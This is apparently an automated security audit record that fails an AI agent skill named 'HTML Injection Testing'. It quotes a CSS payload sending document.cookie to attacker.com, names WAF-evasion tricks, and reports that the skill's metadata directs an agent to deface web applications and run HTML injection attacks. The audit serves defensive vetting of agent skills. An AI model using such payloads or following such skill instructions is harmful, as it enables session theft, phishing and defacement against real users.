HTML Injection Testing

Fail

Audited by Gen Agent Trust Hub on Sep 14, 2026

Risk Level: HIGHDATA_EXFILTRATIONOBFUSCATIONCOMMAND_EXECUTIONPROMPT_INJECTION
Full Analysis
  • [DATA_EXFILTRATION]: The skill provides detailed instructions and functional payloads for exfiltrating sensitive data. Specifically, it demonstrates how to steal user session cookies using CSS-based tracking techniques (e.g., background: url('http://attacker.com/track?cookie='+document.cookie)).
  • [DATA_EXFILTRATION]: Provides functional phishing form templates designed to trick users into entering credentials and submitting them to an external, attacker-controlled server.
  • [OBFUSCATION]: The skill details multiple techniques for evading security filters and Web Application Firewalls (WAFs), including URL encoding, double encoding, null byte injection, and tag splitting.
  • [COMMAND_EXECUTION]: Includes a functional Python script designed to automate HTML injection fuzzing against target web applications, facilitating rapid exploitation.
  • [PROMPT_INJECTION]: The skill's metadata and description explicitly instruct the agent to assist in activities such as 'deface web applications' and 'perform HTML injection attacks', which align with malicious intent.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level
HIGH
Analyzed
Sep 14, 2026, 07:19 AM
Security Audit — agent-trust-hub — HTML Injection Testing